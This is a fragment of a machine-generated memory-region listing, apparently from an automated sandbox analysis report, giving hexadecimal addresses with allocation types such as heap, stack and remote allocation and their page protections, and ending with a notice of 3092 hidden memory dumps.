stack
page read and write
68A0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
63A0000
trusted library allocation
page read and write
4371000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
249D000
stack
page read and write
4423000
trusted library allocation
page read and write
260000
heap
page read and write
278F000
stack
page read and write
185E8259000
heap
page read and write
35B6000
trusted library allocation
page read and write
B5A7000
heap
page read and write
68E0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
1FA58CDD000
heap
page read and write
D7CE000
stack
page read and write
7FFC9DD00000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
15DFD648000
heap
page read and write
67F0000
trusted library allocation
page read and write
6A50000
unkown
page read and write
6413000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7A05000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
DF6B000
stack
page read and write
92778FF000
stack
page read and write
22EC0402000
heap
page read and write
6AB0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
7A00000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
1B128CE1000
trusted library allocation
page read and write
65E1000
heap
page read and write
6A60000
trusted library allocation
page read and write
18880213000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7FFC9D9E0000
trusted library allocation
page read and write
6A66000
trusted library allocation
page read and write
433A000
trusted library allocation
page read and write
185E8256000
heap
page read and write
67B0000
trusted library allocation
page read and write
18880A90000
trusted library allocation
page read and write
1FA58D58000
heap
page read and write
67F0000
trusted library allocation
page read and write
29F0000
remote allocation
page read and write
2EA0000
heap
page read and write
6AA0000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
1B118F4C000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6934000
trusted library allocation
page read and write
6405000
trusted library allocation
page read and write
2E70000
heap
page read and write
1FA58CCB000
heap
page read and write
6A60000
trusted library allocation
page read and write
1FA58CDF000
heap
page read and write
1B118CB0000
trusted library allocation
page read and write
59C077E000
stack
page read and write
29DC000
stack
page read and write
1FA58CBD000
heap
page read and write
7520000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
1B116D6F000
heap
page read and write
1FA58C87000
heap
page read and write
1D4FEF13000
heap
page read and write
6A60000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
408E000
trusted library allocation
page read and write
1FA5974B000
heap
page read and write
30C000
stack
page read and write
6AA0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
63C9000
trusted library allocation
page read and write
1D4FEF02000
heap
page read and write
63D5000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6A6E000
trusted library allocation
page read and write
1FA58DA8000
heap
page read and write
2300000
unkown
page readonly
23CF000
unkown
page read and write
6A60000
trusted library allocation
page read and write
2B10000
heap
page read and write
69DD000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
1381000
unkown
page execute read
3D90000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
6A55000
trusted library allocation
page read and write
692D000
trusted library allocation
page read and write
E08000
unkown
page write copy
6AB0000
trusted library allocation
page read and write
3DA0000
heap
page read and write
7FFC9DB72000
trusted library allocation
page read and write
68C0000
trusted library allocation
page read and write
6AA7000
trusted library allocation
page read and write
784C000
trusted library allocation
page read and write
6942000
trusted library allocation
page read and write
1FA58CE3000
heap
page read and write
6755000
trusted library allocation
page read and write
7A10000
trusted library allocation
page read and write
1B11B3C2000
trusted library allocation
page read and write
78E000
stack
page read and write
367C000
heap
page read and write
75DF000
stack
page read and write
6AA0000
unkown
page read and write
345E000
stack
page read and write
185E81B0000
trusted library allocation
page read and write
698F000
trusted library allocation
page read and write
1B686B22000
heap
page read and write
1FA58D86000
heap
page read and write
6A60000
trusted library allocation
page read and write
1E99CCE7000
heap
page read and write
63E0000
trusted library allocation
page read and write
15453030000
heap
page read and write
6A60000
trusted library allocation
page read and write
255C000
stack
page read and write
E0A000
unkown
page write copy
154531D0000
remote allocation
page read and write
7820000
trusted library allocation
page read and write
6A10000
trusted library allocation
page read and write
41284FC000
stack
page read and write
6880000
trusted library allocation
page read and write
2C20000
heap
page read and write
6780000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
7660000
unkown
page read and write
6750000
trusted library allocation
page read and write
D639000
stack
page read and write
6790000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
1FA58DFB000
heap
page read and write
B569000
heap
page read and write
7520000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
35A0000
trusted library allocation
page read and write
There are 3092 hidden memdumps, click here to show them.